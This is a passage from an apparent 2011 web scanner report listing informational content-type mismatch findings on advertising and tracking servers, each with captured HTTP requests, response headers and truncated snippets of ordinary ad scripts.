In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

22.1. http://0.tqn.com/0g/js/cj017x14t421p9.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://0.tqn.com
Path:   /0g/js/cj017x14t421p9.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /0g/js/cj017x14t421p9.js?rdv=j23 HTTP/1.1
Host: 0.tqn.com
Proxy-Connection: keep-alive
Referer: http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 3516914
Date: Fri, 01 Apr 2011 20:35:46 GMT
Expires: Mon, 29 Mar 2021 20:35:46 GMT
Cache-Control: max-age=315360000
Connection: Keep-Alive
ETag: "KXDIJCDIDLTTUNUX"
Server: Apache
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS UNI"
Keep-Alive: timeout=15, max=97
Content-Type: application/x-javascript
Content-Length: 41649

zAD=new Stk();zh='http://';zai=0;zop=0;zIgs=this.gs&&gs.length;zwl=window.location;zWl=zTr(zwl.href,'?');zOfsL=zs=-1;zGSk=9
q='>';zg=zCn=zSbL=zAc=zGARF=zDMN=zPxzTL=0;z0=zpT=zast=zChA=zAds=zKW='';d=do
...[SNIP]...
22.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:35 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 15-May-2011 13:33:35 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-11-2011-14-59-56_9087559411305125996ZZZZadver_05-12-2011-13-33-35_10260675261305207215; expires=Tue, 10-May-2016 13:33:35 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_10260675261305207215; expires=Thu, 12-May-2011 13:48:35 GMT; path=/; domain=c3metrics.com
Content-Length: 6659
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
22.3. http://480-adver-view.c3metrics.com/v.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /v.js?id=adver&cid=480&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:31 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1008
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s13; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3
...[SNIP]...
22.4. http://a1.interclick.com/getInPageJS.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a1.interclick.com
Path:   /getInPageJS.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /getInPageJS.aspx?a=53&b=9075&cid=10856714 HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1305560188038&e50=1305834684416&e100=1305560187993; sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734266&10654=734265; Li=1=734266&30=734245; Aqprep_Banner728X90=152290=634388251382156836:51780&160825=634389890253630409:51825&150572=634389917073398373:51825&128532=634406189918725039:51745; ucap=sl=1; Aqprep_Banner300X250=128531=634405394911101145:12751&146741=634406189988691650:51941&146744=634406318831937511:51863

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/html; charset=utf-8
Expires: Thu, 12 May 2011 19:33:57 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Thu, 12 May 2011 13:33:57 GMT
Content-Length: 6341

function isSilverlightVersionInstalled(version)
{
if (version == undefined)
version = null;

var isVersionSupported = false;
var container = null;

try
{

...[SNIP]...
22.5. http://a1.interclick.com/getInPageJSProcess.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a1.interclick.com
Path:   /getInPageJSProcess.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /getInPageJSProcess.aspx?a=53&b=9075&cid=10856714&isif=f&rurld=www.mysuburbanlife.com&sl=true&dvp=http%3A//www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th&rurl= HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1305560188038&e50=1305834684416&e100=1305560187993; sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734266&10654=734265; Li=1=734266&30=734245; Aqprep_Banner728X90=152290=634388251382156836:51780&160825=634389890253630409:51825&150572=634389917073398373:51825&128532=634406189918725039:51745; ucap=sl=1; Aqprep_Banner300X250=128531=634405394911101145:12751&146741=634406189988691650:51941&146744=634406318831937511:51863

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ucap=sl=1; domain=.a1.interclick.com; expires=Sun, 22-May-2011 13:34:04 GMT; path=/
Set-Cookie: FC_53=128532=17622465:1; domain=.a1.interclick.com; expires=Fri, 13-May-2011 13:34:04 GMT; path=/
Set-Cookie: IFC=n=1&w9075=1&a128532=1&e=634408760448379734; domain=.a1.interclick.com; expires=Fri, 13-May-2011 13:34:04 GMT; path=/
Set-Cookie: Aqprep_Banner728X90=152290=634388251382156836:51780&160825=634389890253630409:51825&150572=634389917073398373:51825&128532=634407896448399736:9075; domain=.a1.interclick.com; expires=Wed, 10-Aug-2011 13:34:04 GMT; path=/
Set-Cookie: Li=1=734268&30=734245; domain=.a1.interclick.com; expires=Sat, 11-Jun-2011 13:34:04 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Thu, 12 May 2011 13:34:04 GMT
Content-Length: 319

document.write(unescape("%3CSCRIPT%20language%3D%27JavaScript1.1%27%20SRC%3D%22http%3A//ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.13%3Bsz%3D728x90%3Bclick%3Dhttp%3A//a1.interclick.com/ic
...[SNIP]...
22.6. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /PortalServe/?pid=1245872D28820110329161145&pub=un15138&flash=10&time=4|8:31|-5&redir=http://ads.undertone.com/c?oaparams=2__bannerid=191501__campaignid=31210__zoneid=15138__UTLCA=1__cb=0868f0de93164900a3d4042d4f116630__bk=ll347o__id=6e71z3o27cnh1ioxqreihytn2__oadest=$CTURL$&r=0.510057557374239 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2EouvAb7yDAEECAeJozEovALEa7O!E7BCeJpJEotn9OvPEAzwCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=14A30400-7732-07F8-1209-989000080200; PRca=|AKNx*1039:1|AKDn*23939:2|AKLC*1774:2|AKTy*9203:2|AKRD*2017:4|AKQh*130:3|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:16|AKPE*832:3|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKNxAAQl:1|AKDnAGOH:2|AKPEAADS:1|AKRDAJme:3|AKLCAA2c:2|AKTyACY1:2|AKRDAA67:1|AKQhAACG:3|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:5|AKVYAACD:1|AKQkAFx5:4|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FOGh:1|FVpf:2|FYnn:1|FOO8:1|FZt1:1|FZt2:1|FZt3:1|FWcM:1|FW9q:2|FW9n:2|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:3|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GJX7:1|GLBY:2|GK5Q:1|GJTu:1|GMjA:1|GMSn:1|GKwo:2|GLLp:2|GMjB:2|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:7|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FOGhGJX7:1|FVpfGLBY:2|FYnnGK5Q:1|FOO8GJTu:1|FZt1GMjB:1|FZt2GMjA:1|FZt3GMSn:1|FWcMGLLp:1|FW9qGLZC:2|FW9nGLZC:2|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:3|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 13:31:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 1808
Set-Cookie:PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=14A30400-4033-E2F7-1209-9890000A0200; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKNx*1039:2|AKDn*23939:2|AKLC*1774:2|AKTy*9203:2|AKRD*2017:4|AKQh*130:3|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:16|AKPE*832:3|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKNxAAQl:2|AKDnAGOH:2|AKPEAADS:1|AKRDAJme:3|AKLCAA2c:2|AKTyACY1:2|AKRDAA67:1|AKQhAACG:3|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:5|AKVYAACD:1|AKQkAFx5:4|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FOGi:1|FOGh:1|FVpf:2|FYnn:1|FOO8:1|FZt1:1|FZt2:1|FZt3:1|FWcM:1|FW9q:2|FW9n:2|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:3|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GJX6:1|GJX7:1|GLBY:2|GK5Q:1|GJTu:1|GMjA:1|GMSn:1|GKwo:2|GLLp:2|GMjB:2|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:7|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FOGiGJX6:1|FOGhGJX7:1|FVpfGLBY:2|FYnnGK5Q:1|FOO8GJTu:1|FZt1GMjB:1|FZt2GMjA:1|FZt3GMSn:1|FWcMGLLp:1|FW9qGLZC:2|FW9nGLZC:2|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:3|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
22.7. http://apptap.scripps.com/apptap3  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://apptap.scripps.com
Path:   /apptap3

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /apptap3?site=ECP&app=djeff&path=/entertainment/local/article/heder-here-in-this-spp-ppppp&title=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20work&k=v&topic=Entertainment+%28NPC%29 HTTP/1.1
Host: apptap.scripps.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:58 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 48307


           function apptap4(){
               apptap();
               }
           function apptap() {
            //statbug = new Image( 1,1 ) ;
            //app = 'DJEFF' ;
            //ref = document.referrer ;
       /************* DO
...[SNIP]...
22.8. http://ar.voicefive.com/b/rc.pli  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction&n=ar_int_p82806590&1305206907376 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046; ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:16 2011&prad=62874418&arc=40422013&; BMX_G=method->-1,ts->1305206896; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:29 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 42

COMSCORE.BMX.Broker.handleInteraction("");
22.9. http://aud.pubmatic.com/AdServer/Artemis  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://aud.pubmatic.com
Path:   /AdServer/Artemis

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /AdServer/Artemis?dpid=1&segid=D,T,5802,5798,5789,5785 HTTP/1.1
Host: aud.pubmatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/dpsync.html?upixid=6&pubid=398&dp=1
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:3658195966029417970; PUBRETARGET=82_1399045295.806_1336140548; KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C; KADUSERCOOKIE=ED7381A8-F9AB-49E0-BC2C-2A944C186892; __utma=103266945.1788404461.1305207252.1305207252.1305207252.1; __utmb=103266945.1.10.1305207252; __utmc=103266945; __utmz=103266945.1305207252.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:33 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Connection: close
Content-Type: text/html
Content-Length: 7

success
22.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
